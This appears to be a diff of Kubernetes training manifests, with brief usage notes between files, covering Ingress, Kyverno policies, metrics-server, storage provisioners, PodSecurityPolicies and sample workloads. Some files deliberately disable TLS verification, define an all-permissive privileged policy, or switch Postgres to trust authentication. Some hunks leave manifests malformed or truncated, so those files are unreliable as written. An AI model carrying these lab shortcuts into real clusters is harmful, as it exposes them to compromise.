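This HPA relies on the custom metrics API, so an adapter (e.g. prometheus-adapter) must be serving the httplat_latency_seconds metric for the httplat Service. To check that the metric is actually exposed (a sketch assuming the Service lives in the default namespace):

    kubectl get --raw \
      /apis/custom.metrics.k8s.io/v1beta1/namespaces/default/services/httplat/httplat_latency_seconds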

View File

@@ -1,20 +0,0 @@
apiVersion: networking.k8s.io/v1
kind: Ingress
metadata:
name: whatever
spec:
#tls:
#- secretName: whatever.A.B.C.D.nip.io
# hosts:
# - whatever.A.B.C.D.nip.io
rules:
- host: whatever.A.B.C.D.nip.io
http:
paths:
- path: /
pathType: Prefix
backend:
service:
name: whatever
port:
number: 1234
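
This manifest and the v1beta1 variant that follows differ only by API version (networking.k8s.io/v1 requires Kubernetes 1.19 or later). To see which Ingress API versions a cluster serves:

    kubectl api-versions | grep networking.k8s.io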

View File

@@ -1,17 +0,0 @@
apiVersion: networking.k8s.io/v1beta1
kind: Ingress
metadata:
name: whatever
spec:
#tls:
#- secretName: whatever.A.B.C.D.nip.io
# hosts:
# - whatever.A.B.C.D.nip.io
rules:
- host: whatever.A.B.C.D.nip.io
http:
paths:
- path: /
backend:
serviceName: whatever
servicePort: 1234

View File

@@ -1 +0,0 @@
ingress-v1beta1.yaml

k8s/ingress.yaml Normal file
View File

@@ -0,0 +1,14 @@
apiVersion: extensions/v1beta1
kind: Ingress
metadata:
name: cheddar
spec:
rules:
- host: cheddar.A.B.C.D.nip.io
http:
paths:
- path: /
backend:
serviceName: cheddar
servicePort: 80

View File

@@ -1,5 +1,5 @@
apiVersion: v1
kind: Pod
Kind: Pod
metadata:
name: hello
namespace: default

View File

@@ -0,0 +1,167 @@
# Copyright 2017 The Kubernetes Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Configuration to deploy release version of the Dashboard UI compatible with
# Kubernetes 1.8.
#
# Example usage: kubectl create -f <this_file>
# ------------------- Dashboard Secret ------------------- #
apiVersion: v1
kind: Secret
metadata:
labels:
k8s-app: kubernetes-dashboard
name: kubernetes-dashboard-certs
namespace: kube-system
type: Opaque
---
# ------------------- Dashboard Service Account ------------------- #
apiVersion: v1
kind: ServiceAccount
metadata:
labels:
k8s-app: kubernetes-dashboard
name: kubernetes-dashboard
namespace: kube-system
---
# ------------------- Dashboard Role & Role Binding ------------------- #
kind: Role
apiVersion: rbac.authorization.k8s.io/v1
metadata:
name: kubernetes-dashboard-minimal
namespace: kube-system
rules:
# Allow Dashboard to create 'kubernetes-dashboard-key-holder' secret.
- apiGroups: [""]
resources: ["secrets"]
verbs: ["create"]
# Allow Dashboard to create 'kubernetes-dashboard-settings' config map.
- apiGroups: [""]
resources: ["configmaps"]
verbs: ["create"]
# Allow Dashboard to get, update and delete Dashboard exclusive secrets.
- apiGroups: [""]
resources: ["secrets"]
resourceNames: ["kubernetes-dashboard-key-holder", "kubernetes-dashboard-certs"]
verbs: ["get", "update", "delete"]
# Allow Dashboard to get and update 'kubernetes-dashboard-settings' config map.
- apiGroups: [""]
resources: ["configmaps"]
resourceNames: ["kubernetes-dashboard-settings"]
verbs: ["get", "update"]
# Allow Dashboard to get metrics from heapster.
- apiGroups: [""]
resources: ["services"]
resourceNames: ["heapster"]
verbs: ["proxy"]
- apiGroups: [""]
resources: ["services/proxy"]
resourceNames: ["heapster", "http:heapster:", "https:heapster:"]
verbs: ["get"]
---
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
name: kubernetes-dashboard-minimal
namespace: kube-system
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: Role
name: kubernetes-dashboard-minimal
subjects:
- kind: ServiceAccount
name: kubernetes-dashboard
namespace: kube-system
---
# ------------------- Dashboard Deployment ------------------- #
kind: Deployment
apiVersion: apps/v1beta2
metadata:
labels:
k8s-app: kubernetes-dashboard
name: kubernetes-dashboard
namespace: kube-system
spec:
replicas: 1
revisionHistoryLimit: 10
selector:
matchLabels:
k8s-app: kubernetes-dashboard
template:
metadata:
labels:
k8s-app: kubernetes-dashboard
spec:
containers:
- name: kubernetes-dashboard
image: k8s.gcr.io/kubernetes-dashboard-amd64:v1.8.3
ports:
- containerPort: 8443
protocol: TCP
args:
- --auto-generate-certificates
# Uncomment the following line to manually specify Kubernetes API server Host
# If not specified, Dashboard will attempt to auto discover the API server and connect
# to it. Uncomment only if the default does not work.
# - --apiserver-host=http://my-address:port
volumeMounts:
- name: kubernetes-dashboard-certs
mountPath: /certs
# Create on-disk volume to store exec logs
- mountPath: /tmp
name: tmp-volume
livenessProbe:
httpGet:
scheme: HTTPS
path: /
port: 8443
initialDelaySeconds: 30
timeoutSeconds: 30
volumes:
- name: kubernetes-dashboard-certs
secret:
secretName: kubernetes-dashboard-certs
- name: tmp-volume
emptyDir: {}
serviceAccountName: kubernetes-dashboard
# Comment the following tolerations if Dashboard must not be deployed on master
tolerations:
- key: node-role.kubernetes.io/master
effect: NoSchedule
---
# ------------------- Dashboard Service ------------------- #
kind: Service
apiVersion: v1
metadata:
labels:
k8s-app: kubernetes-dashboard
name: kubernetes-dashboard
namespace: kube-system
spec:
ports:
- port: 443
targetPort: 8443
selector:
k8s-app: kubernetes-dashboard

View File

@@ -1,28 +0,0 @@
apiVersion: kyverno.io/v1
kind: ClusterPolicy
metadata:
name: ingress-domain-name
spec:
rules:
- name: create-ingress
match:
resources:
kinds:
- Service
generate:
kind: Ingress
name: "{{request.object.metadata.name}}"
namespace: "{{request.object.metadata.namespace}}"
data:
spec:
rules:
- host: "{{request.object.metadata.name}}.{{request.object.metadata.namespace}}.A.B.C.D.nip.io"
http:
paths:
- backend:
service:
name: "{{request.object.metadata.name}}"
port:
number: 80
path: /
pathType: Prefix
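
With this policy active, every new Service gets a matching Ingress generated for it. A quick test sketch (assuming Kyverno is installed and the A.B.C.D placeholder was replaced with a real ingress address):

    kubectl create deployment web --image=nginx
    kubectl expose deployment web --port=80
    kubectl get ingress web

The generated Ingress routes <service>.<namespace>.A.B.C.D.nip.io to the Service on port 80.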

View File

@@ -1,32 +0,0 @@
apiVersion: kyverno.io/v1
kind: ClusterPolicy
metadata:
name: ingress-domain-name
spec:
rules:
- name: create-ingress
match:
resources:
kinds:
- Service
preconditions:
- key: "{{request.object.spec.ports[0].name}}"
operator: Equals
value: http
generate:
kind: Ingress
name: "{{request.object.metadata.name}}"
namespace: "{{request.object.metadata.namespace}}"
data:
spec:
rules:
- host: "{{request.object.metadata.name}}.{{request.object.metadata.namespace}}.A.B.C.D.nip.io"
http:
paths:
- backend:
service:
name: "{{request.object.metadata.name}}"
port:
name: http
path: /
pathType: Prefix

View File

@@ -1,37 +0,0 @@
apiVersion: kyverno.io/v1
kind: ClusterPolicy
metadata:
name: ingress-domain-name
spec:
rules:
- name: create-ingress
context:
- name: configmap
configMap:
name: ingress-domain-name
namespace: "{{request.object.metadata.namespace}}"
match:
resources:
kinds:
- Service
preconditions:
- key: "{{request.object.spec.ports[0].name}}"
operator: Equals
value: http
generate:
kind: Ingress
name: "{{request.object.metadata.name}}"
namespace: "{{request.object.metadata.namespace}}"
data:
spec:
rules:
- host: "{{request.object.metadata.name}}.{{request.object.metadata.namespace}}.{{configmap.data.domain}}"
http:
paths:
- backend:
service:
name: "{{request.object.metadata.name}}"
port:
name: http
path: /
pathType: Prefix

View File

@@ -1,63 +0,0 @@
apiVersion: kyverno.io/v1
kind: ClusterPolicy
metadata:
name: setup-namespace
spec:
rules:
- name: setup-limitrange
match:
resources:
kinds:
- Namespace
generate:
kind: LimitRange
name: default-limitrange
namespace: "{{request.object.metadata.name}}"
data:
spec:
limits:
- type: Container
min:
cpu: 0.1
memory: 0.1
max:
cpu: 2
memory: 2Gi
default:
cpu: 0.25
memory: 500Mi
defaultRequest:
cpu: 0.25
memory: 250Mi
- name: setup-resourcequota
match:
resources:
kinds:
- Namespace
generate:
kind: ResourceQuota
name: default-resourcequota
namespace: "{{request.object.metadata.name}}"
data:
spec:
hard:
requests.cpu: "10"
requests.memory: 10Gi
limits.cpu: "20"
limits.memory: 20Gi
- name: setup-networkpolicy
match:
resources:
kinds:
- Namespace
generate:
kind: NetworkPolicy
name: default-networkpolicy
namespace: "{{request.object.metadata.name}}"
data:
spec:
podSelector: {}
ingress:
- from:
- podSelector: {}
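
Once this policy is active, creating a namespace should immediately produce the three generated objects, which can be verified with:

    kubectl create namespace hello
    kubectl get limitrange,resourcequota,networkpolicy --namespace=hello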

View File

@@ -1,22 +0,0 @@
apiVersion: kyverno.io/v1
kind: ClusterPolicy
metadata:
name: pod-color-policy-1
spec:
validationFailureAction: enforce
rules:
- name: ensure-pod-color-is-valid
match:
resources:
kinds:
- Pod
selector:
matchExpressions:
- key: color
operator: Exists
- key: color
operator: NotIn
values: [ red, green, blue ]
validate:
message: "If it exists, the label color must be red, green, or blue."
deny: {}

View File

@@ -1,31 +0,0 @@
apiVersion: kyverno.io/v1
kind: ClusterPolicy
metadata:
name: pod-color-policy-2
spec:
validationFailureAction: enforce
background: false
rules:
- name: prevent-color-change
match:
resources:
kinds:
- Pod
preconditions:
- key: "{{ request.operation }}"
operator: Equals
value: UPDATE
- key: "{{ request.oldObject.metadata.labels.color }}"
operator: NotEquals
value: ""
- key: "{{ request.object.metadata.labels.color }}"
operator: NotEquals
value: ""
validate:
message: "Once label color has been added, it cannot be changed."
deny:
conditions:
- key: "{{ request.object.metadata.labels.color }}"
operator: NotEquals
value: "{{ request.oldObject.metadata.labels.color }}"

View File

@@ -1,28 +0,0 @@
apiVersion: kyverno.io/v1
kind: ClusterPolicy
metadata:
name: pod-color-policy-3
spec:
validationFailureAction: enforce
background: false
rules:
- name: prevent-color-change
match:
resources:
kinds:
- Pod
preconditions:
- key: "{{ request.operation }}"
operator: Equals
value: UPDATE
- key: "{{ request.oldObject.metadata.labels.color }}"
operator: NotEquals
value: ""
- key: "{{ request.object.metadata.labels.color }}"
operator: Equals
value: ""
validate:
message: "Once label color has been added, it cannot be removed."
deny:
conditions:

View File

@@ -1,46 +0,0 @@
apiVersion: kyverno.io/v1
kind: ClusterPolicy
metadata:
name: tls-for-ingress
spec:
rules:
- name: create-role
match:
resources:
kinds:
- Certificate
generate:
kind: Role
apiVersion: rbac.authorization.k8s.io/v1
name: "{{request.object.metadata.name}}"
namespace: "{{request.object.metadata.namespace}}"
data:
rules:
- verbs:
- get
apiGroups:
- ""
resources:
- secrets
resourceNames:
- "{{request.object.metadata.name}}"
- name: create-rolebinding
match:
resources:
kinds:
- Certificate
generate:
kind: RoleBinding
apiVersion: rbac.authorization.k8s.io/v1
name: "{{request.object.metadata.name}}"
namespace: "{{request.object.metadata.namespace}}"
data:
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: Role
name: "{{request.object.metadata.name}}"
subjects:
- kind: ServiceAccount
name: default
namespace: "{{request.object.metadata.namespace}}"

View File

@@ -1,160 +0,0 @@
# This is a local copy of:
# https://github.com/rancher/local-path-provisioner/blob/master/deploy/local-path-storage.yaml
apiVersion: v1
kind: Namespace
metadata:
name: local-path-storage
---
apiVersion: v1
kind: ServiceAccount
metadata:
name: local-path-provisioner-service-account
namespace: local-path-storage
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
name: local-path-provisioner-role
rules:
- apiGroups: [ "" ]
resources: [ "nodes", "persistentvolumeclaims", "configmaps" ]
verbs: [ "get", "list", "watch" ]
- apiGroups: [ "" ]
resources: [ "endpoints", "persistentvolumes", "pods" ]
verbs: [ "*" ]
- apiGroups: [ "" ]
resources: [ "events" ]
verbs: [ "create", "patch" ]
- apiGroups: [ "storage.k8s.io" ]
resources: [ "storageclasses" ]
verbs: [ "get", "list", "watch" ]
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
name: local-path-provisioner-bind
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: ClusterRole
name: local-path-provisioner-role
subjects:
- kind: ServiceAccount
name: local-path-provisioner-service-account
namespace: local-path-storage
---
apiVersion: apps/v1
kind: Deployment
metadata:
name: local-path-provisioner
namespace: local-path-storage
spec:
replicas: 1
selector:
matchLabels:
app: local-path-provisioner
template:
metadata:
labels:
app: local-path-provisioner
spec:
serviceAccountName: local-path-provisioner-service-account
containers:
- name: local-path-provisioner
image: rancher/local-path-provisioner:v0.0.19
imagePullPolicy: IfNotPresent
command:
- local-path-provisioner
- --debug
- start
- --config
- /etc/config/config.json
volumeMounts:
- name: config-volume
mountPath: /etc/config/
env:
- name: POD_NAMESPACE
valueFrom:
fieldRef:
fieldPath: metadata.namespace
volumes:
- name: config-volume
configMap:
name: local-path-config
---
apiVersion: storage.k8s.io/v1
kind: StorageClass
metadata:
name: local-path
provisioner: rancher.io/local-path
volumeBindingMode: WaitForFirstConsumer
reclaimPolicy: Delete
---
kind: ConfigMap
apiVersion: v1
metadata:
name: local-path-config
namespace: local-path-storage
data:
config.json: |-
{
"nodePathMap":[
{
"node":"DEFAULT_PATH_FOR_NON_LISTED_NODES",
"paths":["/opt/local-path-provisioner"]
}
]
}
setup: |-
#!/bin/sh
while getopts "m:s:p:" opt
do
case $opt in
p)
absolutePath=$OPTARG
;;
s)
sizeInBytes=$OPTARG
;;
m)
volMode=$OPTARG
;;
esac
done
mkdir -m 0777 -p ${absolutePath}
teardown: |-
#!/bin/sh
while getopts "m:s:p:" opt
do
case $opt in
p)
absolutePath=$OPTARG
;;
s)
sizeInBytes=$OPTARG
;;
m)
volMode=$OPTARG
;;
esac
done
rm -rf ${absolutePath}
helperPod.yaml: |-
apiVersion: v1
kind: Pod
metadata:
name: helper-pod
spec:
containers:
- name: helper-pod
image: busybox
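
Since the local-path StorageClass uses WaitForFirstConsumer, a PVC referencing it stays Pending until a Pod actually mounts it. A minimal claim could look like this (the claim name is arbitrary):

    kind: PersistentVolumeClaim
    apiVersion: v1
    metadata:
      name: local-path-pvc
    spec:
      storageClassName: local-path
      accessModes: [ ReadWriteOnce ]
      resources:
        requests:
          storage: 1Gi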

View File

@@ -1,193 +0,0 @@
# This file is https://github.com/kubernetes-sigs/metrics-server/releases/latest/download/components.yaml
# but with the following arguments added to metrics-server:
# args:
# - --kubelet-insecure-tls
# - --metric-resolution=5s
apiVersion: v1
kind: ServiceAccount
metadata:
labels:
k8s-app: metrics-server
name: metrics-server
namespace: kube-system
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
labels:
k8s-app: metrics-server
rbac.authorization.k8s.io/aggregate-to-admin: "true"
rbac.authorization.k8s.io/aggregate-to-edit: "true"
rbac.authorization.k8s.io/aggregate-to-view: "true"
name: system:aggregated-metrics-reader
rules:
- apiGroups:
- metrics.k8s.io
resources:
- pods
- nodes
verbs:
- get
- list
- watch
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
labels:
k8s-app: metrics-server
name: system:metrics-server
rules:
- apiGroups:
- ""
resources:
- pods
- nodes
- nodes/stats
- namespaces
- configmaps
verbs:
- get
- list
- watch
---
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
labels:
k8s-app: metrics-server
name: metrics-server-auth-reader
namespace: kube-system
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: Role
name: extension-apiserver-authentication-reader
subjects:
- kind: ServiceAccount
name: metrics-server
namespace: kube-system
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
labels:
k8s-app: metrics-server
name: metrics-server:system:auth-delegator
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: ClusterRole
name: system:auth-delegator
subjects:
- kind: ServiceAccount
name: metrics-server
namespace: kube-system
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
labels:
k8s-app: metrics-server
name: system:metrics-server
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: ClusterRole
name: system:metrics-server
subjects:
- kind: ServiceAccount
name: metrics-server
namespace: kube-system
---
apiVersion: v1
kind: Service
metadata:
labels:
k8s-app: metrics-server
name: metrics-server
namespace: kube-system
spec:
ports:
- name: https
port: 443
protocol: TCP
targetPort: https
selector:
k8s-app: metrics-server
---
apiVersion: apps/v1
kind: Deployment
metadata:
labels:
k8s-app: metrics-server
name: metrics-server
namespace: kube-system
spec:
selector:
matchLabels:
k8s-app: metrics-server
strategy:
rollingUpdate:
maxUnavailable: 0
template:
metadata:
labels:
k8s-app: metrics-server
spec:
containers:
- args:
- --cert-dir=/tmp
- --secure-port=4443
- --kubelet-preferred-address-types=InternalIP,ExternalIP,Hostname
- --kubelet-use-node-status-port
- --kubelet-insecure-tls
- --metric-resolution=5s
image: k8s.gcr.io/metrics-server/metrics-server:v0.4.3
imagePullPolicy: IfNotPresent
livenessProbe:
failureThreshold: 3
httpGet:
path: /livez
port: https
scheme: HTTPS
periodSeconds: 10
name: metrics-server
ports:
- containerPort: 4443
name: https
protocol: TCP
readinessProbe:
failureThreshold: 3
httpGet:
path: /readyz
port: https
scheme: HTTPS
periodSeconds: 10
securityContext:
readOnlyRootFilesystem: true
runAsNonRoot: true
runAsUser: 1000
volumeMounts:
- mountPath: /tmp
name: tmp-dir
nodeSelector:
kubernetes.io/os: linux
priorityClassName: system-cluster-critical
serviceAccountName: metrics-server
volumes:
- emptyDir: {}
name: tmp-dir
---
apiVersion: apiregistration.k8s.io/v1
kind: APIService
metadata:
labels:
k8s-app: metrics-server
name: v1beta1.metrics.k8s.io
spec:
group: metrics.k8s.io
groupPriorityMinimum: 100
insecureSkipTLSVerify: true
service:
name: metrics-server
namespace: kube-system
version: v1beta1
versionPriority: 100
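
Once the APIService is up, resource metrics become available through kubectl (thanks to the 5-second resolution set above, the numbers refresh quickly):

    kubectl top nodes
    kubectl top pods --all-namespaces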

View File

@@ -1,20 +0,0 @@
kind: Pod
apiVersion: v1
metadata:
generateName: mounter-
labels:
container.training/mounter: ""
spec:
volumes:
- name: pvc
persistentVolumeClaim:
claimName: my-pvc-XYZ45
containers:
- name: mounter
image: alpine
stdin: true
tty: true
volumeMounts:
- name: pvc
mountPath: /pvc
workingDir: /pvc

View File

@@ -3,7 +3,8 @@ apiVersion: networking.k8s.io/v1
metadata:
name: deny-from-other-namespaces
spec:
podSelector: {}
podSelector:
matchLabels:
ingress:
- from:
- podSelector: {}

View File

@@ -1,8 +0,0 @@
apiVersion: v1
kind: Pod
metadata:
name: nginx-without-volume
spec:
containers:
- name: nginx
image: nginx

View File

@@ -1,13 +0,0 @@
apiVersion: v1
kind: Pod
metadata:
name: nginx-with-volume
spec:
volumes:
- name: www
containers:
- name: nginx
image: nginx
volumeMounts:
- name: www
mountPath: /usr/share/nginx/html/

View File

@@ -1,21 +0,0 @@
apiVersion: v1
kind: Pod
metadata:
name: nginx-with-git
spec:
volumes:
- name: www
containers:
- name: nginx
image: nginx
volumeMounts:
- name: www
mountPath: /usr/share/nginx/html/
- name: git
image: alpine
command: [ "sh", "-c", "apk add git && git clone https://github.com/octocat/Spoon-Knife /www" ]
volumeMounts:
- name: www
mountPath: /www/
restartPolicy: OnFailure

View File

@@ -1,7 +1,7 @@
apiVersion: v1
kind: Pod
metadata:
name: nginx-with-init
name: nginx-with-volume
spec:
volumes:
- name: www
@@ -11,10 +11,11 @@ spec:
volumeMounts:
- name: www
mountPath: /usr/share/nginx/html/
initContainers:
- name: git
image: alpine
command: [ "sh", "-c", "apk add git && sleep 5 && git clone https://github.com/octocat/Spoon-Knife /www" ]
command: [ "sh", "-c", "apk add --no-cache git && git clone https://github.com/octocat/Spoon-Knife /www" ]
volumeMounts:
- name: www
mountPath: /www/
restartPolicy: OnFailure

View File

@@ -1,24 +0,0 @@
apiVersion: v1
kind: Pod
metadata:
name: openebs-local-hostpath-pod
spec:
volumes:
- name: storage
persistentVolumeClaim:
claimName: local-hostpath-pvc
containers:
- name: better
image: alpine
command:
- sh
- -c
- |
while true; do
echo "$(date) [$(hostname)] Kubernetes is better with PVs." >> /mnt/storage/greet.txt
sleep $(($RANDOM % 5 + 20))
done
volumeMounts:
- mountPath: /mnt/storage
name: storage

View File

@@ -1,98 +0,0 @@
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
name: persistentconsul
rules:
- apiGroups: [""]
resources:
- pods
verbs:
- get
- list
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
name: persistentconsul
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: ClusterRole
name: persistentconsul
subjects:
- kind: ServiceAccount
name: persistentconsul
namespace: default
---
apiVersion: v1
kind: ServiceAccount
metadata:
name: persistentconsul
---
apiVersion: v1
kind: Service
metadata:
name: persistentconsul
spec:
ports:
- port: 8500
name: http
selector:
app: persistentconsul
---
apiVersion: apps/v1
kind: StatefulSet
metadata:
name: persistentconsul
spec:
serviceName: persistentconsul
replicas: 3
selector:
matchLabels:
app: persistentconsul
volumeClaimTemplates:
- metadata:
name: data
spec:
accessModes:
- ReadWriteOnce
resources:
requests:
storage: 1Gi
template:
metadata:
labels:
app: persistentconsul
spec:
serviceAccountName: persistentconsul
affinity:
podAntiAffinity:
requiredDuringSchedulingIgnoredDuringExecution:
- labelSelector:
matchExpressions:
- key: app
operator: In
values:
- persistentconsul
topologyKey: kubernetes.io/hostname
terminationGracePeriodSeconds: 10
containers:
- name: consul
image: "consul:1.6"
volumeMounts:
- name: data
mountPath: /consul/data
args:
- "agent"
- "-bootstrap-expect=3"
- "-retry-join=provider=k8s label_selector=\"app=persistentconsul\""
- "-client=0.0.0.0"
- "-data-dir=/consul/data"
- "-server"
- "-ui"
lifecycle:
preStop:
exec:
command:
- /bin/sh
- -c
- consul leave
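
A couple of hedged commands to check that the three Consul servers (auto-joined through the `provider=k8s` retry-join) actually formed a cluster after applying this manifest:

```bash
# All three servers should be listed as "alive".
kubectl exec persistentconsul-0 -- consul members
# The UI (enabled by the -ui flag) is reachable through the Service:
kubectl port-forward service/persistentconsul 8500:8500
```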

File diff suppressed because it is too large

View File

@@ -12,20 +12,10 @@ spec:
labels:
app: postgres
spec:
#schedulerName: stork
initContainers:
- name: rmdir
image: alpine
volumeMounts:
- mountPath: /vol
name: postgres
command: ["sh", "-c", "if [ -d /vol/lost+found ]; then rmdir /vol/lost+found; fi"]
schedulerName: stork
containers:
- name: postgres
image: postgres:12
env:
- name: POSTGRES_HOST_AUTH_METHOD
value: trust
image: postgres:10.5
volumeMounts:
- mountPath: /var/lib/postgresql/data
name: postgres

View File

@@ -1,39 +0,0 @@
---
apiVersion: policy/v1beta1
kind: PodSecurityPolicy
metadata:
name: privileged
annotations:
seccomp.security.alpha.kubernetes.io/allowedProfileNames: '*'
spec:
privileged: true
allowPrivilegeEscalation: true
allowedCapabilities:
- '*'
volumes:
- '*'
hostNetwork: true
hostPorts:
- min: 0
max: 65535
hostIPC: true
hostPID: true
runAsUser:
rule: 'RunAsAny'
seLinux:
rule: 'RunAsAny'
supplementalGroups:
rule: 'RunAsAny'
fsGroup:
rule: 'RunAsAny'
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
name: psp:privileged
rules:
- apiGroups: ['policy']
resources: ['podsecuritypolicies']
verbs: ['use']
resourceNames: ['privileged']

View File

@@ -1,38 +0,0 @@
---
apiVersion: policy/v1beta1
kind: PodSecurityPolicy
metadata:
annotations:
apparmor.security.beta.kubernetes.io/allowedProfileNames: runtime/default
apparmor.security.beta.kubernetes.io/defaultProfileName: runtime/default
seccomp.security.alpha.kubernetes.io/allowedProfileNames: runtime/default
seccomp.security.alpha.kubernetes.io/defaultProfileName: runtime/default
name: restricted
spec:
allowPrivilegeEscalation: false
fsGroup:
rule: RunAsAny
runAsUser:
rule: RunAsAny
seLinux:
rule: RunAsAny
supplementalGroups:
rule: RunAsAny
volumes:
- configMap
- emptyDir
- projected
- secret
- downwardAPI
- persistentVolumeClaim
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
name: psp:restricted
rules:
- apiGroups: ['policy']
resources: ['podsecuritypolicies']
verbs: ['use']
resourceNames: ['restricted']

View File

@@ -1,20 +0,0 @@
kind: PersistentVolume
apiVersion: v1
metadata:
generateName: my-pv-
labels:
container.training/pv: ""
spec:
accessModes:
- ReadWriteOnce
- ReadWriteMany
capacity:
storage: 1G
hostPath:
path: /tmp/my-pv
#storageClassName: my-sc
#claimRef:
# kind: PersistentVolumeClaim
# apiVersion: v1
# namespace: default
# name: my-pvc-XYZ45
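
Because this manifest uses `generateName` rather than `name`, it cannot be used with `kubectl apply` (which needs a stable name); each `kubectl create` mints a new PV with a random suffix. A sketch, assuming the manifest is saved as `my-pv.yaml`:

```bash
kubectl create -f my-pv.yaml    # creates e.g. my-pv-abcde
kubectl create -f my-pv.yaml    # creates another one
# The label makes it easy to list and clean up the whole batch:
kubectl get pv -l container.training/pv
kubectl delete pv -l container.training/pv
```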

View File

@@ -1,13 +0,0 @@
kind: PersistentVolumeClaim
apiVersion: v1
metadata:
generateName: my-pvc-
labels:
container.training/pvc: ""
spec:
accessModes:
- ReadWriteOnce
resources:
requests:
storage: 1G
#storageClassName: my-sc

View File

@@ -1,147 +0,0 @@
---
apiVersion: v1
kind: Namespace
metadata:
name: blue
labels:
app: rainbow
---
apiVersion: apps/v1
kind: Deployment
metadata:
labels:
app: rainbow
color: blue
name: color
namespace: blue
spec:
selector:
matchLabels:
app: rainbow
color: blue
template:
metadata:
labels:
app: rainbow
color: blue
spec:
containers:
- image: jpetazzo/color
name: color
---
apiVersion: v1
kind: Service
metadata:
labels:
app: rainbow
color: blue
name: color
namespace: blue
spec:
ports:
- name: http
port: 80
protocol: TCP
targetPort: 80
selector:
app: rainbow
color: blue
type: ClusterIP
---
apiVersion: v1
kind: Namespace
metadata:
name: green
labels:
app: rainbow
---
apiVersion: apps/v1
kind: Deployment
metadata:
labels:
app: rainbow
color: green
name: color
namespace: green
spec:
selector:
matchLabels:
app: rainbow
color: green
template:
metadata:
labels:
app: rainbow
color: green
spec:
containers:
- image: jpetazzo/color
name: color
---
apiVersion: v1
kind: Service
metadata:
labels:
app: rainbow
color: green
name: color
namespace: green
spec:
ports:
- name: http
port: 80
protocol: TCP
targetPort: 80
selector:
app: rainbow
color: green
type: ClusterIP
---
apiVersion: v1
kind: Namespace
metadata:
name: red
labels:
app: rainbow
---
apiVersion: apps/v1
kind: Deployment
metadata:
labels:
app: rainbow
color: red
name: color
namespace: red
spec:
selector:
matchLabels:
app: rainbow
color: red
template:
metadata:
labels:
app: rainbow
color: red
spec:
containers:
- image: jpetazzo/color
name: color
---
apiVersion: v1
kind: Service
metadata:
labels:
app: rainbow
color: red
name: color
namespace: red
spec:
ports:
- name: http
port: 80
protocol: TCP
targetPort: 80
selector:
app: rainbow
color: red
type: ClusterIP
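
Since every Namespace, Deployment, and Service in this file carries the `app=rainbow` label, the whole three-color setup can be inspected or torn down in one go:

```bash
kubectl get deployments,services --all-namespaces -l app=rainbow
# Deleting the labeled namespaces removes everything inside them too:
kubectl delete namespaces -l app=rainbow
```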

View File

@@ -1,17 +1,28 @@
apiVersion: apps/v1
apiVersion: extensions/v1beta1
kind: Deployment
metadata:
annotations:
deployment.kubernetes.io/revision: "2"
creationTimestamp: null
generation: 1
labels:
app: socat
name: socat
namespace: kube-system
selfLink: /apis/extensions/v1beta1/namespaces/kube-system/deployments/socat
spec:
replicas: 1
selector:
matchLabels:
app: socat
strategy:
rollingUpdate:
maxSurge: 1
maxUnavailable: 1
type: RollingUpdate
template:
metadata:
creationTimestamp: null
labels:
app: socat
spec:
@@ -23,19 +34,34 @@ spec:
image: alpine
imagePullPolicy: Always
name: socat
resources: {}
terminationMessagePath: /dev/termination-log
terminationMessagePolicy: File
dnsPolicy: ClusterFirst
restartPolicy: Always
schedulerName: default-scheduler
securityContext: {}
terminationGracePeriodSeconds: 30
status: {}
---
apiVersion: v1
kind: Service
metadata:
creationTimestamp: null
labels:
app: socat
name: socat
namespace: kube-system
selfLink: /api/v1/namespaces/kube-system/services/socat
spec:
externalTrafficPolicy: Cluster
ports:
- port: 80
protocol: TCP
targetPort: 80
selector:
app: socat
sessionAffinity: None
type: NodePort
status:
loadBalancer: {}

View File

@@ -1,42 +0,0 @@
---
apiVersion: v1
kind: Namespace
metadata:
name: tilt-registry
---
apiVersion: apps/v1
kind: Deployment
metadata:
labels:
app: tilt-registry
name: tilt-registry
namespace: tilt-registry
spec:
selector:
matchLabels:
app: tilt-registry
template:
metadata:
labels:
app: tilt-registry
spec:
containers:
- image: registry
name: registry
---
apiVersion: v1
kind: Service
metadata:
labels:
app: tilt-registry
name: tilt-registry
namespace: tilt-registry
spec:
ports:
- port: 5000
protocol: TCP
targetPort: 5000
nodePort: 30555
selector:
app: tilt-registry
type: NodePort
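
The Service pins `nodePort: 30555`, so the registry answers on that port on every node. A usage sketch, assuming the Docker daemon runs on (or can otherwise reach) one of the cluster nodes:

```bash
# Tag and push an image through the NodePort-exposed registry.
docker tag alpine localhost:30555/alpine
docker push localhost:30555/alpine
```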

View File

@@ -1,87 +0,0 @@
---
apiVersion: v1
kind: ServiceAccount
metadata:
name: traefik-ingress-controller
namespace: kube-system
---
kind: DaemonSet
apiVersion: apps/v1
metadata:
name: traefik-ingress-controller
namespace: kube-system
labels:
k8s-app: traefik-ingress-lb
spec:
selector:
matchLabels:
k8s-app: traefik-ingress-lb
template:
metadata:
labels:
k8s-app: traefik-ingress-lb
name: traefik-ingress-lb
spec:
tolerations:
- effect: NoSchedule
operator: Exists
hostNetwork: true
serviceAccountName: traefik-ingress-controller
